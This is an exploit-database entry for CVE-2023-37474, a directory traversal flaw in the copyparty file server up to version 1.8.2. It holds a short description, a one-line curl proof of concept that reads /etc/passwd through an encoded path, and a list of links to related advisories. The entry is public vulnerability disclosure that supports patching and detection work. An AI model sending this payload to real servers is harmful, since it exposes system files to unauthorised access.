Lucene search
Vartamtzidis TheodorosPACKETSTORM:173822HistoryJul 31, 2023 - 12:00 a.m.
Copyparty 1.8.2 Directory Traversal
2023-07-3100:00:00
Vartamtzidis Theodoros
packetstormsecurity.com
146
copyparty server
directory traversal
exploit
cve-2023-37474
debian linux
0.055 Low
EPSS
Percentile
93.3%
`# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474
#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.
#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
`
Related
nvd
nvd
CVE-2023-37474
2023-07-14 20:15:09
cve
cve
CVE-2023-37474
2023-07-14 20:15:09
veracode
veracode
Path Traversal
2023-07-19 07:38:58
zdt
zdt
copyparty 1.8.2 - Directory Traversal Vulnerability
2023-07-28 00:00:00
osv
osv
copyparty vulnerable to path traversal attack
2023-07-14 21:59:23
CVE-2023-37474
2023-07-14 20:15:09
PYSEC-2023-127
2023-07-14 20:15:00
prion
prion
Path traversal
2023-07-14 20:15:00
github
github
copyparty vulnerable to path traversal attack
2023-07-14 21:59:23
cvelist
cvelist
CVE-2023-37474 Path traversal in copyparty
2023-07-14 19:55:22
nuclei
nuclei
Copyparty <= 1.8.2 - Directory Traversal
2023-10-11 08:22:27
exploitdb
exploitdb
copyparty 1.8.2 - Directory Traversal
2023-07-28 00:00:00